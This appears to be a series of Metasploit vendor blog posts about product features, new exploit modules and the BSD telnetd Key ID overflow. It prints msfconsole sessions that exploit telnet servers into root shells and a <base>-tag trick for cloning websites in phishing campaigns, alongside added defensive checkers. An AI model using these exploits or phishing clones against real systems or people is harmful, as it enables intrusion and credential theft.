
"I'm more comfortable with the Metasploit command line," is an objection I often hear from long-time Metasploit Framework users who are thinking about purchasing a copy of Metasploit Pro or Metasploit Express. What many penetration testers don't know is that you can use the command line in the commercial Metasploit editions, and leverage their advantages at the same time.


Reporting: The commercial Metasploit editions include one-click reporting that includes any work you have completed on the command line. No more cutting and pasting screenshots and collecting password hashes. Simply conduct your penetration test on the command line, then generate the reports - either through the command line or the Web UI. Note that the FISMA and PCI reports are exclusive to Metasploit Pro, while all other reports such as the executive report are available in all commercial editions.


Switching between Web UI and command line: You can switch between the Web UI and the command line version of Metasploit for various tasks, depending on which tool is better suited for which task. For example, you can work with the Web UI to discover the network and import scan data, switch to Metasploit Framework to do exploitation, and keep an overview of your sessions in the Web UI. You don't have to choose one interface over another - just use them as two sides of the same tool.


Metasploit Pro Console: With Metasploit Pro, you'll have access to powerful advanced commands in addition to the regular Metasploit Framework commands. These commands include:


  • pro_discover: Rather than using nmap and importing the results, this feature leverages nmap plus additional techniques to discover hosts, scan for open ports, and fingerprint operating systems and services.
  • pro_exploit: While Metasploit Framework can only exploit one host, one exploit at a time, this feature can test all discovered hosts with all suitable exploits in one step. Choose exploits according to their reliability in exploiting systems safely. In addition, Metasploit Pro automatically chooses only the exploits that are appropriate for your operating system and the ports open on the specific system. Once you have successfully exploited a machine, you won't lose the session again because the Meterpreter payload supports persistent sessions and listeners so that the target machine actively re-establishes a session when it drops. You can also replay previously successful attacks to simplify verification of patch installation and configuration changes.
  • pro_bruteforce: With Metasploit Framework, you can bruteforce one service at a time. Metasploit Pro offers smart brute forcing to simultaneously conduct a password strength audit on many account types and services. Before simulating a brute force attack, you can choose which account types should be tested, for example based on their lockout risk. The password guesses are based on default passwords, default and custom dictionaries, and from information gathered during the network scan. Using credential recycling and pass-the-hash techniques, you can reuse collected passwords and hashes to gain access to other systems.
  • pro_collect: Gather proof of access and obtain authentication credentials to go even deeper. Unlike in the Metasploit Framework, where you have to manually collect evidence, Metasploit Pro gathers system information, screenshots, passwords, SSH keys and files, all with one command. You can further automate the evidence collection with macros that run your choice of post-exploitation tools, e.g. a key logger. Additionally, you can extend the reach of Metasploit Pro by recycling and replaying captured authentication credentials to gain access to a greater number of targets.
  • pro_report: Generate reports in PDF, RTF, HTML, or XML format. Available standard reports include the Executive Summary, Detailed Audit Report, Compromised Hosts, Collected Evidence, Network Services, Authentication Tokens, Web Vulnerabilities, PCI DSS Report, and FISMA Report. You can choose to exclude sensitive information from the reports, for example you can mask usernames/passwords, or exclude screenshots or collected passwords.
  • pro_user: With Metasploit Pro, you can collaborate in teams on any project, share results, and report on the entire team's findings using the reporting functionality. The pro_user command lists all registered Metasploit Pro users in your Metasploit instance.


Some Metasploit Pro features are not yet implemented in the command line, such as web application scanning, auditing and exploitation as well as the social engineering campaigns.


When using the Metasploit command line with the commercial features, please ensure that you are using the stable trunk, which shares the database with the Web UI, not the development trunk. To access a console that uses the stable trunk, launch the 'Metasploit Console' link in Windows or the /opt/metasploit-4.1.3/msfpro executable on Linux. For more information, see this discussion.


If you would like to test Metasploit Pro, download a free trial today!

VPN Pivoting is one of the best but also most elusive features in Metasploit Pro, so the best way is to see it. That's why I've decided to post a snippet of a recent webinar, where HD Moore shows this feature in action.


VPN pivoting enables users to route any network traffic through an exploited host with two NICs to a different network. For example, you could run nmap, Metasploit network discovery, or Nexpose vulnerability scans through the VPN pivot. Using a TUN/TAP adaptor on the Metasploit Pro machine, the exploited host shows no trace of a new network adapter. This enables you to get full access to a local network after having exploited a single machine, e.g. after a social engineering attack. Here's the video:



Note: This video is an excerpt from the webinar about Metasploit 4.1 entitled “What's new with Metasploit? HD Moore's personal tour of the next product version”. To view a recording of this webinar, please visit this page.

It's Wednesday, and while many of you are enjoying the week off between Christmas and New Year's, we've been cranking out another Metasploit Update.


Telnet Encrypt Option Scanner and Exploits

I won't rehash this subject too much since HD already covered these modules in depth here and here, but this update does include exploits for CVE-2011-4862, written by Jaime Penalba Estebanez, Brandon Perry, Dan Rosenberg, and HD Moore. These exploits are kind of a big deal; not only are traditional servers running telnet vulnerable, but there are about a zillion embedded and network devices that enable telnet servers and use BSD and Kerberos5 derived code. Thanks to the Metasploit scanner module, administrators and pentesters alike can quickly audit their environment for suspect telnet servers.


Metasploit Lab

This week, Jonathan Cran cranked out a bunch of small fixes to the 'lab' plugin for compatibility and usability. If you haven't had a chance to experiment with the lab plugin, it's just a matter of `load lab` and `help` to get started from the Metasploit Framework console. Despite the unassuming name, this plugin is hugely useful for both professional and amateur Metasploit developers, since it allows for direct access to running Virtual Machines -- this can speed up exploit development time considerably, since you can RC-script most major management tasks on VMware and VirtualBox hosted targets after firing off in-progress exploits and fuzzers.


Getting Started with Easy Exploits

This update also sees the addition of an exploit for the OpenTFTP (CVE-2008-2161). We had this vulnerability up on the Contributing to Metasploit wiki page for a couple weeks, which is a list of relatively "easy" exploits that Metasploit newbies ought to take a crack at. Out of the blue, first-time contributor "steponequit" submitted a pull request with a fully functional exploit and a link to the vulnerable version of the software, which was thought to have been lost to the mists of time. Also, he gave us this excellent protip: If you're looking for old versions of opensource software, take a look at the archives on -- it's a treasure trove of out-of-date software, all ready to be exploited for fun and practice.


Other New Modules

In addition to all of that, we have new modules for scanning and using default administrator credentials on OKI printers, exploits for Plone (CVE-2011-3587) and Splunk (CVE-2011-4642), and an exploit for the Oracle Job Scheduler as described in David Litchfield's Oracle Hacker's Handbook.



For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

In my last post, I discussed the recent BSD telnetd vulnerability and demonstrated the scanner module added to the Metasploit Framework. Since then, two new exploit modules have been released; one for FreeBSD versions 5.3 - 8.2 and another for Red Hat Enterprise Linux 3.


Starting with an updated copy of the Metasploit Framework, load the console and kick off the scanner:


$ msfconsole
msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf auxiliary(telnet_encrypt_overflow) > set RHOSTS
msf auxiliary(telnet_encrypt_overflow) > set THREADS 64
msf auxiliary(telnet_encrypt_overflow) > run
[+] VULNERABLE: localhost.localdomain (Linux release 2.4.21-4.EL #1 ...
[+] VULNERABLE: FreeBSD/i386 (freebsd.localdomain) (pts/0)\x0d\x0a\x0d\x0alogin:
[*] Auxiliary module execution completed


For the first target (Linux), we will choose the RHEL 3 exploit:


msf> use exploit/linux/telnet/telnet_encrypt_keyid
msf exploit(telnet_encrypt_keyid) > set RHOST
msf exploit(telnet_encrypt_keyid) > exploit
[*] Started bind handler
[*] Brute forcing with 1 possible targets
[*] Trying target Red Hat Enterprise Linux 3 (krb5-telnet)...
[*] Sending first payload
[*] Sending second payload...
[*] Sending stage (36 bytes) to
[*] Command shell session 1 opened

uid=0(root) gid=0(root)

Abort session 1? [y/N] y

[*] Command shell session 1 closed.  Reason: User exit


Easy enough, now on to our FreeBSD target:


msf> use exploit/freebsd/telnet/telnet_encrypt_keyid
msf exploit(telnet_encrypt_keyid) > set RHOST
msf exploit(telnet_encrypt_keyid) > exploit
[*] Started reverse handler on
[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2...
[*] Sending first payload
[*] Sending second payload...
[*] Command shell session 2 opened

uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)


That about sums it up. If for some crazy reason you are running telnet on your BSD systems or have the bad luck to be using a BSD-derived telnet daemon on linux (such as krb5-telnet), patch or upgrade to SSH as soon as possible. If you would like to contribute a new exploit target for either Linux or Windows, all we typically need is the output of the following command:


$ msfelfscan -j edx /path/to/telnetd (msfelfscan is part of the Metasploit Framework)


The exploit is ridiculously simple and only a single jmp target is needed to add reliable targeting for a new platform. Supporting BSD variants such as Dragonfly, NetBSD, and so on is likely to require no more effort than a new jmp target (assuming no major compiler changes).


Dan Rosenberg confirmed that BSD-derived telnet CLIENTS are vulnerable as well, but we have not added any exploits for the client side at this time. Thanks again to Brandon Perry for getting the ball rolling on the exploit code and testing against multiple targets.



On December 23rd, the FreeBSD security team published an advisory stating that a previously unknown vulnerability in the Telnet daemon was being exploited in the wild and that a patch had been issued. This vulnerability was interesting for three major reasons:


  1. The code in question may be over 20 years old and affects most BSD-derived telnetd services
  2. The overflow occurs in a structure with a function pointer stored after the target buffer (Line 166)
  3. The telnet service is still prevalent enough that it was being exploited in the wild in the first place


On December 27th, Jaime Penalba Estebanez (of Painsec) released a shiny exploit for FreeBSD 8.0, 8.1, and 8.2. This exploit works extremely well due to the conditions when the vulnerability is triggered. Essentially, the location of the buffer provided by the user is static per binary (data section) and exploiting this only requires access to a copy of the same binary from the target platform and knowledge of a readable address. This is about as easy as it gets for remote memory-corruption exploits on the BSD platform.


A port of this exploit to the Metasploit Framework is in progress and we just added a scanner module that can be used to identify vulnerable instances of the telnet service. This module tries to trigger the vulnerability with an invalid pointer, causing the inetd-spawned process to exit. Since this process automatically respawns, it should be safe to scan all affected inetd-based systems. To use the scanner module, make sure your copy of the framework is updated, and launch the Metasploit Console:


$ msfconsole
msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf auxiliary(telnet_encrypt_overflow) > set RHOSTS
msf auxiliary(telnet_encrypt_overflow) > set THREADS 64
msf auxiliary(telnet_encrypt_overflow) > run
[+] VULNERABLE: Linux 3.0.0-14-generic ( (pts/11)...
[+] VULNERABLE: FreeBSD/amd64 (freebsd) (pts/0)\x0d\x0a\x0d\x0a...
[+] VULNERABLE: FreeBSD/i386 (freebsd) (pts/0)\x0d\x0a\x0d\x0a...
[+] NOT VULNERABLE: No reply to 64-byte Key ID: SUNTEN SunOS 5.10...
[*] Auxiliary module execution completed
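As an added example (my code, not the Metasploit scanner module shown above or in the earlier post), a passive inventory check a defender can run before anything else: it parses a telnet server's opening negotiation and reports whether the server negotiates the ENCRYPT option at all, which is the code path the Key ID overflow lives in. The sample banners are constructed, and the check only reads what the server volunteers on connect; it never sends a Key ID.

```python
import socket

# Telnet protocol constants (RFC 854) and option numbers from the IANA registry.
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPTION_NAMES = {
    1: "ECHO", 3: "SGA", 24: "TTYPE", 31: "NAWS", 32: "TSPEED",
    33: "LFLOW", 34: "LINEMODE", 35: "XDISPLOC", 36: "ENVIRON",
    37: "AUTHENTICATION", 38: "ENCRYPT", 39: "NEW-ENVIRON",
}
OPT_ENCRYPT = 38  # the option whose Key ID handling overflows (CVE-2011-4862)


def parse_negotiation(data):
    """Split a raw telnet stream into (commands, text).

    commands is a list of (command, option, payload) tuples; payload is only
    non-empty for SB suboptions.  A truncated sequence at the end is dropped.
    """
    commands, text, i, n = [], bytearray(), 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= n:
            break                      # lone IAC at the end of the buffer
        cmd = data[i + 1]
        if cmd == IAC:                 # IAC IAC is an escaped 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= n:
                break
            commands.append((cmd, data[i + 2], b""))
            i += 3
        elif cmd == SB:                # IAC SB <opt> ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end == -1 or i + 2 >= end:
                break                  # unterminated or empty suboption
            commands.append((SB, data[i + 2], bytes(data[i + 3:end])))
            i = end + 2
        else:                          # NOP, GA, AYT and other 2-byte commands
            commands.append((cmd, None, b""))
            i += 2
    return commands, bytes(text)


def encrypt_offered(data):
    """True if the peer sent WILL ENCRYPT or DO ENCRYPT, i.e. the vulnerable
    option negotiation is reachable on this service."""
    commands, _ = parse_negotiation(data)
    return any(c in (WILL, DO) and o == OPT_ENCRYPT for c, o, _ in commands)


def summarize(data):
    """Inventory-style summary of what a telnet banner negotiates."""
    commands, text = parse_negotiation(data)
    options = sorted({OPTION_NAMES.get(o, str(o))
                      for _, o, _ in commands if o is not None})
    return {"encrypt_offered": encrypt_offered(data), "options": options,
            "banner": text.decode("ascii", "replace").strip()}


def grab_banner(host, port=23, timeout=3.0, limit=512):
    """Connect and read the server's opening negotiation without replying.

    Nothing is sent, so the ENCRYPT Key ID handling is never exercised.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        buf = b""
        while len(buf) < limit:
            try:
                chunk = s.recv(limit - len(buf))
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
        return buf


# Constructed sample banners, not captured from real hosts.
# A BSD-derived telnetd offering AUTHENTICATION and ENCRYPT before login:
BSD_STYLE = (b"\xff\xfd\x25\xff\xfb\x26\xff\xfd\x26\xff\xfd\x18\xff\xfd\x20"
             b"\r\n\r\nlogin: ")
# A minimal telnetd (BusyBox-like) that never negotiates ENCRYPT:
MINIMAL = (b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27\xff\xfb\x03"
           b"\xff\xfb\x01\r\nlogin: ")

if __name__ == "__main__":
    for name, sample in (("bsd-style", BSD_STYLE), ("minimal", MINIMAL)):
        print(name, summarize(sample))
```

A host that never offers ENCRYPT is outside this bug's reach, while one that does is worth confirming with the scanner above and patching, or replacing with SSH as the post recommends.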


Although this vulnerability was reported as a flaw in FreeBSD, it also affects other BSD variants and any telnet service based on the BSD code. This includes quite a few non-BSD systems as well, such as:


  • Older versions of Mac OS X (newer versions do not include the ENCRYPT option). 10.0-10.3 or so may be vulnerable
  • Older versions of Solaris (unconfirmed). Newer versions already enforce a 64-byte Key ID. Maybe Sun/Oracle found this and forgot to share.
  • Linux installations using inetutils telnetd (as opposed to netkit telnetd). Debian and Ubuntu still package this and some older distributions of Linux appear to ship with it by default. So far, the only "common" case appears to be RHEL3 (or at least some of its free clones).

There is a good chance that the same flaw affects (or at least, used to affect) other commercial Unix variants (BSDi, SCO, AIX, HP-UX, etc). We are still trying to identify which specific operating systems packaged code based on the vulnerable BSD upstream. There is also a chance that this bug will affect older embedded Unix deployments as well. So far, most of the recent embedded Linux distributions use BusyBox or NetKit for telnet, but it wouldn't be crazy for a vendor to package the inetutils version instead.


There is also a chance that this flaw affects Telnet clients; this opens the door to client-side exploitation through any method of forcing (or enticing) a user to access a particular telnet service. This is all fairly preliminary - we should have a followup blog post available soon with additional information about the scope and exploitability of this flaw.


Huge thanks to Dan Rosenberg and Brandon Perry for digging into this with me, along with all of the folks on Twitter who helped test/verify affected systems.



Yesterday I asked a question on Twitter and got a lot of responses from the security community.


I was finishing up a Metasploit module that I was coding last weekend. I posed the challenge to myself of scanning for egress ports while not actually inside a network. I accomplished this task by setting up multiple listeners and embedding HTTP <img> tags in a webpage. This can easily be done with Metasploit Framework. I created a report page and a stealth page with no images. Metasploit keeps track of the connections on the attacker side as well. I also wanted to do this module without Javascript because browsers are getting smarter about Javascript doing weird things. Also I have some ports on here (23, 25, etc) that are blocked by some browsers, but you never know so I included them as well.



You can download the module at my GitHub or wait for it to appear in the Metasploit trunk. In the meantime if you have a question about it, please leave a comment below.
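The technique above leaves a distinctive footprint on the defender's side: one internal client contacting one external host on many different ports within a few seconds. As an added example (my code, not the module the post describes), here is detection logic over a constructed connection-log format that surfaces such bursts and records which of the probed ports the perimeter actually allowed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format, constructed for this example (not any real product's):
# "<YYYY-MM-DD HH:MM:SS> <src-ip> -> <dst-ip>:<dst-port> <ALLOW|DENY>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<src>[\d.]+) -> "
    r"(?P<dst>[\d.]+):(?P<port>\d+) (?P<action>ALLOW|DENY)$")


def parse_lines(lines):
    """Yield (timestamp, src, dst, port, action); malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                   m["src"], m["dst"], int(m["port"]), m["action"])


def find_egress_probes(lines, min_ports=5, window=timedelta(seconds=30)):
    """Find (src, dst) pairs where one client touched at least min_ports
    distinct ports on one host inside `window`: the signature of a browser
    fetching <img> tags from a single listener host on many ports."""
    events = defaultdict(list)
    for ts, src, dst, port, action in parse_lines(lines):
        events[(src, dst)].append((ts, port, action))
    findings = []
    for (src, dst), evs in events.items():
        evs.sort()
        lo, best = 0, None
        for hi in range(len(evs)):          # sliding window over sorted events
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            ports = {p for _, p, _ in evs[lo:hi + 1]}
            if len(ports) >= min_ports and (best is None or len(ports) > len(best[0])):
                best = (ports, evs[lo:hi + 1])
        if best:
            ports, span = best
            findings.append({
                "src": src, "dst": dst, "ports": sorted(ports),
                # ports the perimeter let through: what the probe page learned
                "allowed_ports": sorted({p for _, p, a in span if a == "ALLOW"}),
                "first": span[0][0], "last": span[-1][0],
            })
    return findings


# Constructed sample log: one client bursts across nine ports of one host,
# another client browses normally.  Addresses are documentation ranges.
SAMPLE_LOG = """\
2011-12-15 10:00:01 10.1.2.3 -> 203.0.113.10:80 ALLOW
2011-12-15 10:00:01 10.1.2.3 -> 203.0.113.10:443 ALLOW
2011-12-15 10:00:02 10.1.2.3 -> 203.0.113.10:21 DENY
2011-12-15 10:00:02 10.1.2.3 -> 203.0.113.10:22 DENY
2011-12-15 10:00:02 10.1.2.3 -> 203.0.113.10:23 DENY
2011-12-15 10:00:03 10.1.2.3 -> 203.0.113.10:25 DENY
2011-12-15 10:00:03 10.1.2.3 -> 203.0.113.10:8080 ALLOW
2011-12-15 10:00:04 10.1.2.3 -> 203.0.113.10:3389 DENY
2011-12-15 10:00:05 10.1.2.3 -> 203.0.113.10:53 ALLOW
2011-12-15 10:00:07 10.1.2.9 -> 198.51.100.5:443 ALLOW
2011-12-15 10:00:09 10.1.2.9 -> 198.51.100.5:80 ALLOW
2011-12-15 10:05:00 10.1.2.9 -> 198.51.100.7:443 ALLOW
not a log line
"""

if __name__ == "__main__":
    for f in find_egress_probes(SAMPLE_LOG.splitlines()):
        print(f"{f['src']} -> {f['dst']}: probed {f['ports']}, "
              f"allowed {f['allowed_ports']} ({f['first']} .. {f['last']})")
```

The allowed_ports list is the same information the probe page hands to the tester, so it doubles as a to-do list for tightening outbound filtering.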





Social engineering campaigns can be a lot more effective if you can impersonate a well-known website that users trust. However, when you simply clone a website by cutting-and-pasting the page source and putting it on your own server, your links will stop working. Copying all links and images from the other site can be cumbersome, but there's an alternative: the HTML <base> tag. It specifies a default address/target for all links on a page; it is inserted into the head element.


Let's say you've just cloned a page from the website Initially, all images will be broken. Once you drop this little line into the header section of your page, they will appear like on the original page - and all relative links will work as well:


<base href="" />
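Seen from the other side, that one line is also a tell: a page served from one origin whose <base> sends every relative link somewhere else is exactly what a cloned login page looks like. As an added example (my code, not from the original post), a checker that parses a page, resolves its references the way a browser would after <base>, and reports how much of the page points off-site; the sample pages and hostnames are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def _origin(url):
    """(scheme, host[:port]) of a URL, lower-cased for comparison."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower())


class _RefCollector(HTMLParser):
    """Collect the first <base href> and every href/src/action on the page."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base":
            if self.base is None and a.get("href"):   # browsers honour the first
                self.base = a["href"]
            return
        for key in ("href", "src", "action"):
            val = a.get(key)
            if val and not val.lower().startswith(("javascript:", "#", "data:", "mailto:")):
                self.refs.append(val)


def analyze_page(html, served_url):
    """Report whether a page served from served_url redirects its relative links
    to another origin through <base>, and how many references resolve off-site."""
    p = _RefCollector()
    p.feed(html)
    p.close()
    served = _origin(served_url)
    # Relative URLs resolve against <base> when present, otherwise the page URL.
    base_url = urljoin(served_url, p.base) if p.base else served_url
    resolved = [urljoin(base_url, r) for r in p.refs]
    offsite = [u for u in resolved if _origin(u) != served]
    return {
        "base": p.base,
        "base_offsite": p.base is not None and _origin(base_url) != served,
        "refs": len(resolved),
        "offsite_refs": len(offsite),
        "offsite_hosts": sorted({urlsplit(u).netloc.lower() for u in offsite}),
    }


# Constructed samples.  CLONED is a copy of a sign-in page served from a
# look-alike host, with <base> pointing at the real site and the form posting
# elsewhere; GENUINE is the same kind of page served from its own origin.
CLONED = """<html><head><title>Sign in</title>
<base href="https://bank.example/login/" />
<link rel="stylesheet" href="css/site.css"></head>
<body><img src="/img/logo.png"><a href="help.html">Help</a>
<form action="https://collector.example.net/post" method="post"></form>
<a href="#top">top</a></body></html>"""
GENUINE = """<html><head><link rel="stylesheet" href="/css/site.css"></head>
<body><img src="/img/logo.png"><form action="/login"></form></body></html>"""

if __name__ == "__main__":
    print(analyze_page(CLONED, "https://login-bank.example.net/index.html"))
    print(analyze_page(GENUINE, "https://bank.example/login/"))
```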


Please note that it may be illegal to clone a website if you don't have the website owner's consent. Also, you need to have permission before you launch a social engineering attack, usually from the organization whose employees you are auditing.


Please share any other helpful social engineering tips in the comments section below. If you'd like to try out web-based social engineering attacks, download a free trial of Metasploit Pro.

The Metasploit Update is out, and it's a little smaller than you might expect. We've recently rejiggered our development to QA to release workflow here at Rapid7, and that means that this week, we cut the release a couple days earlier than usual in order to ensure the work flow all makes sense and that the releases get the post-commit QA attention that they deserve. The end result is that we'll have a pretty light release this week (due to the shortened development cycle), but going forward, week-to-week changes should hit about the same volume as before.

TFTP Client Library

Metasploit Framework already ships a library for emulating a TFTP server, used mostly for setting up a rogue PXE server. PXE (pre-boot execution environment) is used to deliver operating system configuration details, so by running your own, you can pre-compromise unwary PXE clients. While that's pretty awesome in and of itself, I was kind of amazed to find no reasonable client-side implementation. What if a pen-tester lucks into finding a PXE server that has write access enabled? With the help of community contributor K. Reid Wightman, Metasploit features a new TFTP client library. With this, a penetration tester can now seize control of that legitimate PXE server and provide custom, pre-owned netboot images.


For usage details for the library, just take a peek at auxiliary/admin/tftp/tftp_transfer_util, which provides file upload and download functionality. Of course, you're not limited to merely squatting on PXE servers -- apparently, there are plenty of write-enabled TFTP servers floating around internal networks responsible for all sorts of interesting gear.

Firewall Fingerprinting

Another module of note is Patrick Webster's community submission, the auxiliary/gather/checkpoint_hostname module. This module takes advantage of an information leak present on current versions of CheckPoint's Firewall-1 product, disclosing not only the firewall's hostname, but the hostname of the associated SmartCenter management host. Not only is positively fingerprinting a client's firewall vendor pretty useful for the penetration tester, but getting the management console's hostname for free is an added bonus that can help the pen-tester concentrate efforts on a high-value target.


Perhaps the most noteworthy aspect of this module is that it's apparently 0-day. At first, it looked like a repackage of the 2001 vulnerability described by SecuriTeam, but Patrick insists that it's a) different and b) recent. So, you're not going to find a proper advisory or CVE number or anything for this.

New Modules

The other two modules of note in this release are auxiliary/admin/edirectory/edirectory_edirutil, which leverages the vulnerability described in CVE-2008-0926 to gain unauthorized access to logs and the ability to start and stop services on Novell's eDirectory server, and post/windows/gather/credentials/razorsql, which is a post-exploitation module that makes quick work of saved database administrator credentials on a compromised workstation.


For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product.


Scanning Networks with Metasploit Community



Basic Exploitation with Metasploit Community


Basic Exploitation vs. Smart Exploitation


Importing Nexpose Scan Data into Metasploit


Using Metasploit Community with Nexpose


If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now!

The Metasploit project recently switched from SVN to Git/GitHub for source code management. Since then, there have been a number of questions from the community about using Git -- both in general and in the context of the framework.  Let's try shining a little light.


Why did we change?

Git makes it easier to collaborate and to implement complex workflows among developers, which is ideal both for open-source projects and for Agile/Scrum/XP-oriented teams.  As a commercial open-source operation, Rapid7 fits both these descriptions.  There's also a decent argument to be made for the idea that Git is simply a *better* way to manage source code than Subversion -- that it represents an evolutionary leap forward in source control, and that any pain devs feel in switching to it will rapidly be forgotten as soon as they start making use of its many advantageous features.


In the last four years or so, I've converted several projects and several dozen devs to using Git.  Not one of them has ever felt like going back to SVN.


How is Metasploit using GitHub?

The most important thing that contributors need to be aware of is the concept of the Pull Request.  This is how your code patches can make it into the framework.  The Pull Request is not part of Git itself, but rather a workflow for code collaboration that GitHub has built into their system.  As a way to integrate multiple contributors into the process of improving Metasploit, it is invaluable.


First things to do when switching to Git


  1. Install the cheat gem:

     gem install cheat

  2. Colorize and customize ~/.gitconfig per the great stuff in the cheat sheet:

     cheat git

  3. Make yourself aliases for common commands, either with bash directly or with the alias feature of git config (outlined in cheat sheet).

  4. Bookmark these things:

     Start w/ the Rapid7 resources.  There's a "survival guide" cheatsheet in there that we put together with the most-common git commands broken down by scenario, as well as a link to the excellent Git SVN Crash Course, which is probably the fastest way for SVN-savvy devs to come up-to-speed on Git.

  5. Get comfortable with a graphical merge tool for fixing conflicts in merges (Linux: kdiff3 or Meld, OS X: default is FileMerge).


Warning and Encouragement


Like any super-powerful, paradigm-shattering piece of software, Git has a learning curve.  You will need to spend *some* time understanding it in order to be able to use it, as many of the SCM concepts you're used to simply won't apply, and there are also many new concepts specific to Git.  Don't let this get you down.  You will soon wonder how you ever used anything else.

Update: I just published a new blog post for using Metasploit on BackTrack 5 R2.


BackTrack 5 R1 comes pre-installed with Metasploit Framework 4.0. Unfortunately, Metasploit Community, which brings a great new Web UI and other functionality, was introduced in version 4.1, so it's not included by default. Updating Metasploit Framework using the msfupdate command will not install the Web UI. In addition, BT5 only makes the development trunk available, not the stable trunk (read about the difference). This post tells you how you can update your version of BackTrack5 to Metasploit Community, including both the stable and the dev trunk of Metasploit Framework. If you want to use Metasploit Express or Metasploit Pro on BackTrack5, follow the same instructions and enter your product key at the end to activate your commercial Metasploit edition.


Installing Metasploit Community over the existing Metasploit Framework installation won't work for several reasons, one being a conflict with the postgres database. The best way is to start by uninstalling Metasploit Framework v3 first. After logging on to BT5 (user: root / password: toor), use the following command to uninstall the software:






After the uninstall has completed, enter the BackTrack GUI with the following command:




Open Firefox (menu Applications / Internet / Firefox Web Browser), go to and download the Linux installer. When the download has completed, open a terminal window and enter the following commands:


chmod u+x /root/





At the end of the installer, the Metasploit Web UI opens in Firefox (hint: it's opened behind your terminal window). Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception.


By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost.




Enter a username and password, and click Create Account. Click on Register your Metasploit license here!


Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license.


  1. Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  2. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  3. Enter your email address and hit Go.
  4. Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  5. Hit Go again.
  6. You'll see a redirect warning that starts with "Request". Simply ignore it.
  7. Close the tab. You should now be back in the Metasploit Web UI.




Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:




Congratulations, you're good to go!


UPDATE - Jan 3, 2011


The BackTrack folks just published that you can now get the new unified Metasploit installer with a dist-upgrade operation or through apt-get. The open source Metasploit trunk is still present under /opt/metasploit/msf3/.

Sample Resource Scripts

About a week ago, munky9001 posted on Reddit the headline, DB_Autopwn Deprecated! About time. Shortly after, HD wrote up a blog post, Six Ways to Automate Metasploit, with the moral of the story being, "don't cry for db_autopwn, there are already much better methods to get your automated pwnage on." Of these, the easiest and most straightforward way to automate things is to write a resource script.


This week's update now includes a standard location for resource scripts contributed by the Metasploit community, creatively named $install_dir/scripts/resource. Running scripts out of this location from the framework command prompt is as straightforward as


> resource scripts/resource/rc_script_name.rc


...and you're off.


There's exactly one rc script in there right now (thanks Mubix!), but if you have a resource script that you'd like to share, please feel free to submit it via a pull request to our GitHub repository -- especially if your favorite resource script does something novel and interesting with modules, targets, or something we haven't thought of yet.


New Modules

Metasploit contributor pello brings us a new auxiliary module, dns_fuzzer.rb. As part of testing, I threw this module against three different DNS resolvers to just watch the traffic, and promptly crashed one of the targets. Clearly, grown-up DNS servers shouldn't fall over in the face of malformed traffic delivered at regular Internet speeds, so if you're feeling like hunting for remote 0-day for fame and fortune, you could do worse than starting with this module.


We have three new modules exploiting CVE-classified bugs: CVE-2011-4350, which affects the Yaws webserver; CVE-2011-4453, which affects the PHP application PmWiki; and CVE-2005-4832, which affects Oracle Database Server 10g. The Oracle bug dates back to 2005, but as mentioned last week, running installations of older, unpatched software is often a surprising finding that a penetration tester can present to a client.


As for the non-CVE-classified exploits, we're now shipping modules for Family Connections (a quasi-blog application), Traq (a bug tracking application), Ability Server (a commercial FTP server), and CoDeSys Webserver. That last one with the funny camel-cased name apparently has something to do with a webserver that's used to control remote PLCs for SCADA operations, so the fact that it's unclassified seems a little disconcerting.


For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

